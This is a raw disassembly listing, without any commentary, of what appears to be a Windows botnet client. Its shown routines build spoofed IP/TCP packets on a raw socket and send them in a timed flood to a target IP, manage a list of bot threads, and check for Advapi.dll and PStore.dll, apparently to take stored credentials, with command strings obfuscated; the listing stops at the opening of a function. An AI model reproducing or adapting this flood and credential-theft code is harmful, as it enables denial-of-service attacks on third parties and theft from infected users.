mov [ebp+var_50], edx
call sub_429B9C
cdq
mov ecx, 1FA4h
mov [ebp+var_18], 45h
idiv ecx
mov [ebp+var_17], 4
mov [ebp+var_20], edx
call sub_429B9C
mov [ebp+var_14], ax
call sub_429B9C
push 0Ah
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_4C]
push eax
call dword_456F38 ; ntohs
push [ebp+var_4]
mov [ebp+var_12], ax
call dword_456F38 ; ntohs
mov [ebp+var_16], ax
mov [ebp+var_10], bl
call sub_429B9C
push 0Eh
mov [ebp+var_C], edi
cdq
pop ecx
idiv ecx
push [ebp+arg_0]
mov al, byte ptr [ebp+edx*4+var_88]
mov [ebp+var_F], al
call dword_456F7C ; inet_addr
mov [ebp+var_8], eax
lea eax, [ebp+var_18]
push 14h
push eax
call sub_41E3E8
mov [ebp+var_E], ax
lea eax, [ebp+var_18]
push 14h
push eax
push [ebp+arg_24]
call sub_429420
add esp, 14h
lea eax, [ebp+var_98]
push 10h
push eax
push 0
push [ebp+var_4]
push [ebp+arg_24]
push [ebp+arg_14]
call dword_437294 ; sendto
push [ebp+arg_C]
call dword_437190 ; Sleep
loc_422DDF: ; CODE XREF: sub_422B50+1B2�j
call esi ; dword_437188
sub eax, [ebp+arg_1C]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+arg_8]
jbe loc_422D07
push [ebp+arg_24]
call sub_4298F2
pop ecx
push [ebp+arg_14]
call dword_4372D8 ; closesocket
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_422B50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422E10 proc near ; DATA XREF: sub_40A9FE+941A�o
var_2A5C = byte ptr -2A5Ch
var_34C = byte ptr -34Ch
var_24C = dword ptr -24Ch
var_248 = byte ptr -248h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_94 = byte ptr -94h
var_88 = byte ptr -88h
var_80 = byte ptr -80h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = word ptr -62h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2A5Ch
call sub_429B60
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 69h
mov esi, eax
pop ecx
lea edi, [ebp+var_24C]
rep movsd
xor esi, esi
push 0Eh
inc esi
xor ebx, ebx
mov [eax+1A0h], esi
mov eax, [ebp+var_24C]
mov [ebp+arg_0], eax
pop ecx
xor eax, eax
lea edi, [ebp+var_A7]
mov [ebp+var_A8], bl
rep stosd
stosw
stosb
mov edi, dword_437188
call edi ; dword_437188
push eax
call sub_429B8F
pop ecx
push 0FFh
push 3
push 2
call dword_4372BC ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz loc_422F15
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
lea eax, [ebp+var_2A5C]
push offset aSSD__0 ; "%s %s <%d>."
push eax
call sub_429B03
add esp, 14h
cmp [ebp+var_B0], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_422ED8
cmp [ebp+var_B4], ebx
jnz short loc_422EE0
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 10h
loc_422ED8: ; CODE XREF: sub_422E10+A4�j
cmp [ebp+var_B4], ebx
jz short loc_422EFA
loc_422EE0: ; CODE XREF: sub_422E10+AC�j
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 10h
loc_422EFA: ; CODE XREF: sub_422E10+CE�j
push 0FFFFFFFFh
call dword_4372D8 ; closesocket
push [ebp+var_C8]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
loc_422F15: ; CODE XREF: sub_422E10+6E�j
lea ecx, [ebp+var_3C]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_3C], esi
call dword_43728C ; setsockopt
cmp eax, 0FFFFFFFFh
jnz loc_422FC3
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
lea eax, [ebp+var_2A5C]
push offset aSSD__0 ; "%s %s <%d>."
push eax
call sub_429B03
add esp, 14h
cmp [ebp+var_B0], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_422F85
cmp [ebp+var_B4], ebx
jnz short loc_422F8D
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 10h
loc_422F85: ; CODE XREF: sub_422E10+151�j
cmp [ebp+var_B4], ebx
jz short loc_422FA7
loc_422F8D: ; CODE XREF: sub_422E10+159�j
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 10h
loc_422FA7: ; CODE XREF: sub_422E10+17B�j
push [ebp+var_8]
call dword_4372D8 ; closesocket
push [ebp+var_C8]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
loc_422FC3: ; CODE XREF: sub_422E10+11B�j
lea eax, [ebp+var_248]
push eax
call dword_4372C0 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz loc_42305F
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
lea eax, [ebp+var_2A5C]
push offset aSInvalidTarget ; "%s Invalid target IP."
push eax
call sub_429B03
add esp, 0Ch
cmp [ebp+var_B0], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_423021
cmp [ebp+var_B4], ebx
jnz short loc_423029
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 10h
loc_423021: ; CODE XREF: sub_422E10+1ED�j
cmp [ebp+var_B4], ebx
jz short loc_423043
loc_423029: ; CODE XREF: sub_422E10+1F5�j
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 10h
loc_423043: ; CODE XREF: sub_422E10+217�j
push [ebp+var_8]
call dword_4372D8 ; closesocket
push [ebp+var_C8]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
loc_42305F: ; CODE XREF: sub_422E10+1C3�j
push 10h
lea eax, [ebp+var_4C]
push ebx
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_34C]
push 100h
push eax
call dword_4372E0 ; gethostname
lea eax, [ebp+var_34C]
push eax
call dword_4372A4 ; gethostbyname
mov eax, [eax+0Ch]
push ebx
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4C], 2
mov [ebp+var_C], eax
call dword_456F38 ; ntohs
mov [ebp+var_4A], ax
lea eax, [ebp+var_248]
push eax
call dword_456F7C ; inet_addr
mov [ebp+var_48], eax
mov [ebp+var_4], ebx
call edi ; dword_437188
mov [ebp+var_24], eax
call edi ; dword_437188
sub eax, [ebp+var_24]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_C0]
ja loc_423357
push 14h
pop esi
loc_4230DD: ; CODE XREF: sub_422E10+541�j
call sub_429B9C
cdq
mov ecx, 0FFh
push 28h
idiv ecx
mov eax, [ebp+var_C]
mov [ebp+var_38], 45h
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+var_C], edx
call dword_456F38 ; ntohs
cmp [ebp+var_B8], ebx
mov [ebp+var_36], ax
mov [ebp+var_34], 1
mov [ebp+var_32], bx
mov [ebp+var_30], 80h
mov [ebp+var_2F], 6
mov [ebp+var_2E], bx
jz short loc_42312D
mov eax, [ebp+var_C]
jmp short loc_423138
; ---------------------------------------------------------------------------
loc_42312D: ; CODE XREF: sub_422E10+316�j
push offset dword_457C40
call dword_456F7C ; inet_addr
loc_423138: ; CODE XREF: sub_422E10+31B�j
cmp [ebp+var_C4], ebx
mov [ebp+var_2C], eax
mov eax, [ebp+var_48]
mov [ebp+var_28], eax
jnz short loc_423159
call sub_429B9C
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_42315F
; ---------------------------------------------------------------------------
loc_423159: ; CODE XREF: sub_422E10+337�j
push [ebp+var_C4]
loc_42315F: ; CODE XREF: sub_422E10+347�j
call dword_456F38 ; ntohs
mov [ebp+var_1E], ax
call sub_429B9C
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_456F38 ; ntohs
push 12345678h
mov [ebp+var_20], ax
call dword_456F34 ; ntohl
mov [ebp+var_1C], eax
lea eax, [ebp+var_1C8]
push offset aUbqs_hzpkh1 ; "/uBQS.HZPkh1"
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_4231B2
mov [ebp+var_18], ebx
mov [ebp+var_13], 2
jmp loc_423247
; ---------------------------------------------------------------------------
loc_4231B2: ; CODE XREF: sub_422E10+394�j
lea eax, [ebp+var_1C8]
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_4231D2
mov [ebp+var_18], ebx
mov [ebp+var_13], 10h
jmp short loc_423247
; ---------------------------------------------------------------------------
loc_4231D2: ; CODE XREF: sub_422E10+3B7�j
lea eax, [ebp+var_1C8]
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_42320B
call sub_429B9C
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_18], edx
call sub_429B9C
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
jmp short loc_423241
; ---------------------------------------------------------------------------
loc_42320B: ; CODE XREF: sub_422E10+3D7�j
lea eax, [ebp+var_1C8]
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_423247
call sub_429B9C
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_18], edx
call sub_429B9C
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, cl
loc_423241: ; CODE XREF: sub_422E10+3F9�j
add dl, 2
mov [ebp+var_13], dl
loc_423247: ; CODE XREF: sub_422E10+39D�j
; sub_422E10+3C0�j ...
push 200h
mov [ebp+var_14], 50h
call dword_456F38 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebp+var_2C]
mov [ebp+var_6C], eax
mov eax, [ebp+var_28]
push esi
mov [ebp+var_E], bx
mov [ebp+var_10], bx
mov [ebp+var_68], eax
mov [ebp+var_64], bl
mov [ebp+var_63], 6
call dword_456F38 ; ntohs
mov [ebp+var_62], ax
lea eax, [ebp+var_6C]
push 20h
push eax
lea eax, [ebp+var_A8]
push eax
call sub_429420
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_88]
push eax
call sub_429420
lea eax, [ebp+var_A8]
push 34h
push eax
call sub_41E3E8
mov [ebp+var_10], ax
lea eax, [ebp+var_38]
push esi
push eax
lea eax, [ebp+var_A8]
push eax
call sub_429420
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_429420
push 4
lea eax, [ebp+var_80]
push ebx
push eax
call sub_429760
add esp, 44h
lea eax, [ebp+var_A8]
push 28h
push eax
call sub_41E3E8
mov [ebp+var_2E], ax
lea eax, [ebp+var_38]
push esi
push eax
lea eax, [ebp+var_A8]
push eax
call sub_429420
add esp, 14h
lea eax, [ebp+var_4C]
push 10h
push eax
push ebx
lea eax, [ebp+var_A8]
push 3Ch
push eax
push [ebp+var_8]
call dword_437294 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_42340B
push [ebp+var_BC]
inc [ebp+var_4]
call dword_437190 ; Sleep
call edi ; dword_437188
sub eax, [ebp+var_24]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_C0]
jbe loc_4230DD
loc_423357: ; CODE XREF: sub_422E10+2C4�j
push [ebp+var_8]
call dword_456FF0 ; closesocket
mov eax, [ebp+var_4]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_C0]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_248]
push [ebp+var_4]
push eax
lea eax, [ebp+var_1C8]
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
lea eax, [ebp+var_2A5C]
push offset aSSWithSToIpS_S ; "%s %s with %s to IP: %s. Sent: %d packe"...
push eax
call sub_429B03
add esp, 24h
cmp [ebp+var_B0], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_4233D6
cmp [ebp+var_B4], ebx
jnz short loc_4233DE
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 10h
loc_4233D6: ; CODE XREF: sub_422E10+5A2�j
cmp [ebp+var_B4], ebx
jz short loc_4233F8
loc_4233DE: ; CODE XREF: sub_422E10+5AA�j
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 10h
loc_4233F8: ; CODE XREF: sub_422E10+5CC�j
push [ebp+var_C8]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
loc_42340B: ; CODE XREF: sub_422E10+518�j
call dword_437170 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_248]
push [ebp+var_4]
push eax
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
push offset aSErrorSendingP ; "%s Error sending packets to IP: %s. Pac"...
lea eax, [ebp+var_2A5C]
push 2710h
push eax
call sub_429BBE
add esp, 1Ch
cmp [ebp+var_B0], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_423469
cmp [ebp+var_B4], ebx
jnz short loc_423471
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 10h
loc_423469: ; CODE XREF: sub_422E10+635�j
cmp [ebp+var_B4], ebx
jz short loc_42348B
loc_423471: ; CODE XREF: sub_422E10+63D�j
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 10h
loc_42348B: ; CODE XREF: sub_422E10+65F�j
push [ebp+var_8]
call dword_4372D8 ; closesocket
push [ebp+var_C8]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
sub_422E10 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4234A7 proc near ; CODE XREF: sub_4020BA+DA�p
; sub_402459+120�p ...
var_26F8 = byte ptr -26F8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 26F8h
call sub_429B60
lea eax, [ebp+arg_8]
push edi
push eax
lea eax, [ebp+var_26F8]
push [ebp+arg_4]
push 26F6h
push eax
call sub_42B8AA
add esp, 10h
xor edi, edi
mov eax, offset dword_46B010
loc_4234D7: ; CODE XREF: sub_4234A7+40�j
cmp byte ptr [eax], 0
jz short loc_4234EB
add eax, 2724h
inc edi
cmp eax, offset dword_6607E4
jl short loc_4234D7
jmp short loc_423527
; ---------------------------------------------------------------------------
loc_4234EB: ; CODE XREF: sub_4234A7+33�j
push esi
mov esi, edi
imul esi, 2724h
lea eax, [ebp+var_26F8]
push 270Fh
push eax
lea eax, dword_46B010[esi]
push eax
call sub_429D10
mov eax, [ebp+arg_0]
and dword_46D724[esi], 0
add esp, 0Ch
and dword_46D728[esi], 0
mov dword_46D720[esi], eax
pop esi
loc_423527: ; CODE XREF: sub_4234A7+42�j
mov eax, edi
pop edi
leave
retn
sub_4234A7 endp
; =============== S U B R O U T I N E =======================================
sub_42352C proc near ; CODE XREF: sub_40A9FE+D49�p
; sub_4235A4+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_42359E
cmp esi, 0CDh
jge short loc_42359E
imul esi, 2724h
cmp dword_46D72C[esi], ebx
jz short loc_423552
inc ebp
loc_423552: ; CODE XREF: sub_42352C+23�j
push edi
lea edi, dword_46D728[esi]
mov dword_46D72C[esi], ebx
mov dword_46D720[esi], ebx
mov eax, [edi]
mov dword_46D724[esi], ebx
cmp eax, ebx
jbe short loc_423578
push eax
call sub_420105
pop ecx
loc_423578: ; CODE XREF: sub_42352C+43�j
mov [edi], ebx
lea edi, dword_46D730[esi]
mov byte ptr dword_46B010[esi], bl
push dword ptr [edi]
call dword_456FF0 ; closesocket
push ebx
mov [edi], ebx
push dword_46D72C[esi]
call dword_437054 ; TerminateThread
pop edi
loc_42359E: ; CODE XREF: sub_42352C+D�j
; sub_42352C+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_42352C endp
; =============== S U B R O U T I N E =======================================
sub_4235A4 proc near ; CODE XREF: sub_40A9FE+CB5�p
; sub_4182BA+659�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_46B010
loc_4235B0: ; CODE XREF: sub_4235A4+2A�j
cmp byte ptr [esi], 0
jz short loc_4235C1
push edi
call sub_42352C
test eax, eax
pop ecx
jz short loc_4235C1
inc ebx
loc_4235C1: ; CODE XREF: sub_4235A4+F�j
; sub_4235A4+1A�j
add esi, 2724h
inc edi
cmp esi, offset dword_6607E4
jl short loc_4235B0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_4235A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4235D6 proc near ; CODE XREF: sub_423654+1A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_46D724
loc_4235EA: ; CODE XREF: sub_4235D6+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_42360C
test edi, edi
jle short loc_4235FE
cmp [esi], edi
jz short loc_4235FE
cmp ebx, edi
jnz short loc_42360C
loc_4235FE: ; CODE XREF: sub_4235D6+1E�j
; sub_4235D6+22�j
push ebx
call sub_42352C
test eax, eax
pop ecx
jz short loc_42360C
inc [ebp+var_4]
loc_42360C: ; CODE XREF: sub_4235D6+1A�j
; sub_4235D6+26�j ...
add esi, 2724h
inc ebx
cmp esi, offset dword_662EF8
jl short loc_4235EA
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_4235D6 endp
; =============== S U B R O U T I N E =======================================
sub_423623 proc near ; CODE XREF: sub_402459+20F�p
; sub_402675+19F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 2724h
mov dword_46D72C[eax], ecx
mov dword_46D720[eax], ecx
mov dword_46D724[eax], ecx
mov dword_46D728[eax], ecx
mov dword_46D730[eax], ecx
mov byte ptr dword_46B010[eax], cl
retn
sub_423623 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423654 proc near ; CODE XREF: sub_40A9FE+A74�p
; sub_40A9FE+218D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_14], eax
jz short loc_423667
push [ebp+arg_14]
call sub_42A100
pop ecx
loc_423667: ; CODE XREF: sub_423654+8�j
push ebx
push esi
push edi
push eax
push [ebp+arg_18]
call sub_4235D6
pop ecx
mov [ebp+arg_14], eax
test eax, eax
pop ecx
mov esi, offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
jle short loc_4236CB
cmp [ebp+arg_8], 0
mov ebx, offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
mov edi, offset aSSDS ; "%s %s %d %s"
jnz short loc_4236AC
cmp [ebp+arg_C], 0
jnz short loc_4236B2
push ebx
push eax
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
add esp, 1Ch
loc_4236AC: ; CODE XREF: sub_423654+3B�j
cmp [ebp+arg_C], 0
jz short loc_423714
loc_4236B2: ; CODE XREF: sub_423654+41�j
push ebx
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CDD4
add esp, 1Ch
jmp short loc_423714
; ---------------------------------------------------------------------------
loc_4236CB: ; CODE XREF: sub_423654+2B�j
xor eax, eax
mov ebx, offset aIbtox1Hofe0hcx ; "IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/"
cmp [ebp+arg_8], eax
mov edi, offset aSSS_3 ; "%s (%s) %s"
jnz short loc_4236FA
cmp [ebp+arg_C], eax
jnz short loc_423700
cmp [ebp+arg_10], eax
jz short loc_423714
push ebx
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
add esp, 18h
loc_4236FA: ; CODE XREF: sub_423654+86�j
cmp [ebp+arg_C], 0
jz short loc_423714
loc_423700: ; CODE XREF: sub_423654+8B�j
push ebx
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CDD4
add esp, 18h
loc_423714: ; CODE XREF: sub_423654+5C�j
; sub_423654+75�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_423654 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423719 proc near ; DATA XREF: sub_40A9FE+EAB�o
var_C8 = dword ptr -0C8h
var_C4 = byte ptr -0C4h
var_44 = dword ptr -44h
var_34 = dword ptr -34h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0C8h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov ecx, [ebp+var_C8]
mov dword ptr [eax+0BCh], 1
mov eax, [ebp+var_10]
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
mov [ebp+var_4], eax
push offset aSThreadsList ; "%s Threads List:"
test eax, eax
lea eax, [ebp+var_C4]
mov [ebp+arg_0], ecx
push eax
push ecx
jnz short loc_42376B
call sub_41CE4A
jmp short loc_423770
; ---------------------------------------------------------------------------
loc_42376B: ; CODE XREF: sub_423719+49�j
call sub_41CDD4
loc_423770: ; CODE XREF: sub_423719+50�j
add esp, 10h
xor ebx, ebx
mov edi, offset dword_46B010
mov esi, offset aD_S ; "%d. %s"
loc_42377F: ; CODE XREF: sub_423719+A8�j
cmp byte ptr [edi], 0
jz short loc_4237B4
xor eax, eax
cmp [ebp+var_34], eax
jnz short loc_423793
cmp [edi+2714h], eax
jnz short loc_4237B4
loc_423793: ; CODE XREF: sub_423719+70�j
cmp [ebp+var_4], eax
push edi
push ebx
lea eax, [ebp+var_C4]
push esi
push eax
push [ebp+arg_0]
jnz short loc_4237AC
call sub_41CE4A
jmp short loc_4237B1
; ---------------------------------------------------------------------------
loc_4237AC: ; CODE XREF: sub_423719+8A�j
call sub_41CDD4
loc_4237B1: ; CODE XREF: sub_423719+91�j
add esp, 14h
loc_4237B4: ; CODE XREF: sub_423719+69�j
; sub_423719+78�j
add edi, 2724h
inc ebx
cmp edi, offset dword_6607E4
jl short loc_42377F
cmp [ebp+var_4], 0
pop edi
pop esi
pop ebx
lea eax, [ebp+var_C4]
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push offset aSEndOfList_ ; "%s End of list."
push eax
push [ebp+arg_0]
jnz short loc_4237E7
call sub_41CE4A
jmp short loc_4237EC
; ---------------------------------------------------------------------------
loc_4237E7: ; CODE XREF: sub_423719+C5�j
call sub_41CDD4
loc_4237EC: ; CODE XREF: sub_423719+CC�j
add esp, 10h
push [ebp+var_44]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
sub_423719 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423800 proc near ; CODE XREF: sub_40204B+5�p
; sub_4020BA+27�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_46D720
loc_423807: ; CODE XREF: sub_423800+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_423810
inc eax
loc_423810: ; CODE XREF: sub_423800+D�j
add ecx, 2724h
cmp ecx, offset dword_662EF4
jl short loc_423807
retn
sub_423800 endp
; =============== S U B R O U T I N E =======================================
sub_42381F proc near ; CODE XREF: sub_4033A3+C�p
; .text:0040A22E�p ...
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_46D720
push esi
loc_423829: ; CODE XREF: sub_42381F+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_423842
add ecx, 2724h
inc edx
cmp ecx, offset dword_662EF4
jl short loc_423829
pop esi
retn
; ---------------------------------------------------------------------------
loc_423842: ; CODE XREF: sub_42381F+10�j
mov eax, edx
pop esi
retn
sub_42381F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423846 proc near ; DATA XREF: sub_40A9FE+1265�o
var_27D4 = byte ptr -27D4h
var_C4 = dword ptr -0C4h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 27D4h
call sub_429B60
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_C4]
xor ebx, ebx
rep movsd
cmp [ebp+var_3C], ebx
mov edi, [ebp+var_C4]
mov dword ptr [eax+0BCh], 1
jz short loc_423894
push 2710h
lea eax, [ebp+var_27D4]
push [ebp+var_3C]
push eax
call sub_429D10
add esp, 0Ch
loc_423894: ; CODE XREF: sub_423846+35�j
cmp dword_457034, ebx
mov esi, offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
jnz short loc_4238A8
call sub_423919
jmp short loc_4238BE
; ---------------------------------------------------------------------------
loc_4238A8: ; CODE XREF: sub_423846+59�j
push esi
lea eax, [ebp+var_C0]
push offset aSAdvapi_dllNot ; "%s Advapi.dll not loaded"
push eax
push edi
call sub_41CE4A
add esp, 10h
loc_4238BE: ; CODE XREF: sub_423846+60�j
cmp dword_4570A4, ebx
jnz short loc_4238F0
push [ebp+var_14]
cmp [ebp+var_3C], ebx
push [ebp+var_C]
push [ebp+var_10]
jz short loc_4238ED
lea eax, [ebp+var_27D4]
push eax
loc_4238DB: ; CODE XREF: sub_423846+A8�j
lea eax, [ebp+var_C0]
push edi
push eax
call sub_423C7A
add esp, 18h
jmp short loc_423906
; ---------------------------------------------------------------------------
loc_4238ED: ; CODE XREF: sub_423846+8C�j
push ebx
jmp short loc_4238DB
; ---------------------------------------------------------------------------
loc_4238F0: ; CODE XREF: sub_423846+7E�j
push esi
lea eax, [ebp+var_C0]
push offset aSPstore_dllNot ; "%s PStore.dll not loaded"
push eax
push edi
call sub_41CE4A
add esp, 10h
loc_423906: ; CODE XREF: sub_423846+A5�j
push [ebp+var_40]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
pop edi
pop esi
pop ebx
sub_423846 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423919 proc near ; CODE XREF: sub_423846+5B�p
var_2EC = byte ptr -2ECh
var_224 = byte ptr -224h
var_15C = byte ptr -15Ch
var_C4 = byte ptr -0C4h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
